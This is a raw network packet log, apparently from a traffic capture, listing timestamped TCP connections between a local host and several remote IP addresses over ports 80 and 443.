Nov 8, 2024 16:15:30.683285952 CET	443	49740	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.683382988 CET	49740	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.683708906 CET	49740	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.683717012 CET	443	49740	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.814413071 CET	49677	443	192.168.2.10	20.42.65.85
Nov 8, 2024 16:15:30.814420938 CET	49733	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:30.981287003 CET	443	49739	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.983279943 CET	49739	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.983308077 CET	443	49739	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:31.007559061 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.008150101 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.008176088 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.008593082 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.008601904 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.021553040 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.022064924 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.022092104 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.022558928 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.022566080 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.025325060 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.025805950 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.025814056 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.026304007 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.026309013 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.056524038 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.057037115 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.057060003 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.057492018 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.057496071 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.057519913 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.057811975 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.057830095 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.058141947 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.058147907 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.134846926 CET	443	49739	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:31.134959936 CET	443	49739	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:31.135030031 CET	49739	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:31.135529041 CET	49739	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:31.137322903 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.137401104 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.137579918 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.137612104 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.137631893 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.137665987 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.137674093 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.139663935 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:31.140158892 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.140196085 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.140244007 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.140412092 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.140424013 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.140929937 CET	49742	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:31.145385027 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:31.145452023 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:31.146258116 CET	80	49742	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:31.146311045 CET	49742	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:31.146456957 CET	49742	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:31.151772976 CET	80	49742	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:31.154861927 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.154926062 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.154978037 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.155148029 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.155162096 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.155179977 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.155188084 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.155257940 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.155466080 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.155539989 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.155539989 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.155827045 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.155837059 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.164777994 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.164803028 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.164885044 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.166297913 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.166316032 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.166652918 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.166706085 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.166757107 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.167294025 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.167309046 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.185267925 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.185682058 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.185744047 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.186280012 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.186300039 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.186311007 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.186316967 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.187546968 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.188303947 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.188399076 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.188939095 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.188958883 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.188972950 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.188978910 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.190093994 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.190124035 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.190216064 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.190665960 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.190675974 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.191961050 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.191984892 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.192037106 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.192217112 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.192226887 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.883407116 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.883919001 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.883944035 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.884372950 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.884381056 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.902823925 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.903302908 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.903331995 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.903702974 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.903708935 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.907604933 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.907983065 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.908006907 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.908495903 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.908503056 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.909996033 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.910367012 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.910403967 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.910767078 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.910778046 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.922059059 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.922440052 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.922465086 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:31.922832966 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:31.922838926 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.014467001 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.014616013 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.014684916 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.014847994 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.014864922 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.014878035 CET	49741	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.014883995 CET	443	49741	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.017718077 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.017772913 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.017867088 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.018034935 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.018050909 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.031968117 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.032191992 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.032249928 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.032278061 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.032284021 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.032299042 CET	49743	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.032304049 CET	443	49743	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.035180092 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.035206079 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.035305977 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.035665035 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.035677910 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.036844969 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.036900997 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.037031889 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.037071943 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.037071943 CET	49745	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.037091017 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.037102938 CET	443	49745	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.039421082 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.039459944 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.039568901 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.039707899 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.039720058 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.039855003 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.040081978 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.040132046 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.040172100 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.040183067 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.040194988 CET	49744	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.040200949 CET	443	49744	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.042296886 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.042308092 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.042496920 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.042661905 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.042674065 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.052791119 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.052887917 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.052958965 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.053278923 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.053296089 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.053306103 CET	49746	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.053312063 CET	443	49746	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.057370901 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.057405949 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.057606936 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.057825089 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.057837009 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.220670938 CET	49671	443	192.168.2.10	204.79.197.203
Nov 8, 2024 16:15:32.302958965 CET	443	49740	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:32.331566095 CET	49740	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:32.331590891 CET	443	49740	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:32.472687006 CET	443	49740	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:32.472807884 CET	443	49740	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:32.472898960 CET	49740	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:32.479321957 CET	49740	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:32.627427101 CET	49733	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:32.628451109 CET	49752	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:32.633368015 CET	80	49733	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:32.633384943 CET	80	49752	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:32.633426905 CET	49733	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:32.633464098 CET	49752	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:32.633635044 CET	49752	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:32.638591051 CET	80	49752	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:32.763012886 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.770839930 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.772052050 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.776398897 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.777622938 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.777654886 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.778165102 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.778177977 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.788184881 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.788213015 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.788646936 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.788654089 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.792150021 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.792170048 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.792232990 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.792238951 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.792946100 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.792946100 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.792953968 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.792967081 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.795105934 CET	80	49742	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:32.801408052 CET	49753	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:32.801469088 CET	443	49753	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:32.801793098 CET	49753	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:32.802222967 CET	49753	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:32.802242994 CET	443	49753	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:32.845663071 CET	49742	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:32.881756067 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.882894039 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.882925034 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.883541107 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.883552074 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.903242111 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.903331041 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.903403997 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.903744936 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.903769970 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.903783083 CET	49747	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.903789997 CET	443	49747	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.907464027 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.907493114 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.907598019 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.907761097 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.907769918 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.915101051 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.915180922 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.915359974 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.915401936 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.915401936 CET	49749	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.915422916 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.915437937 CET	443	49749	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.918303013 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.918344975 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.918623924 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.918828011 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.918837070 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.920742035 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.920948029 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.921027899 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.921029091 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.921108007 CET	49748	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.921123981 CET	443	49748	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.922425032 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.923016071 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.923114061 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.923131943 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.923140049 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.923152924 CET	49750	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.923157930 CET	443	49750	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.923686028 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.923712969 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.923882961 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.924165964 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.924177885 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.925507069 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.925533056 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:32.925621033 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.926002979 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:32.926019907 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.029340982 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.029417992 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.029512882 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.029700041 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.029723883 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.029736042 CET	49751	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.029742956 CET	443	49751	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.032824993 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.032866001 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.032922029 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.033096075 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.033106089 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.417617083 CET	443	49753	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:33.419823885 CET	49753	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:33.419863939 CET	443	49753	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:33.579741001 CET	443	49753	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:33.579850912 CET	443	49753	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:33.579945087 CET	49753	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:33.580729008 CET	49753	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:33.584733009 CET	49742	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:33.586066961 CET	49759	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:33.589910030 CET	80	49742	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:33.590159893 CET	49742	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:33.590884924 CET	80	49759	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:33.590962887 CET	49759	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:33.591073036 CET	49759	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:33.595870972 CET	80	49759	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:33.634788990 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.635255098 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.635268927 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.635763884 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.635767937 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.645454884 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.645867109 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.645885944 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.646328926 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.646336079 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.686873913 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.687405109 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.687431097 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.687889099 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.687900066 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.694101095 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.694571972 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.694590092 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.695060968 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.695066929 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.762887001 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.762980938 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.763084888 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.763250113 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.763250113 CET	49754	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.763269901 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.763282061 CET	443	49754	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.765908003 CET	49760	443	192.168.2.10	13.107.246.45
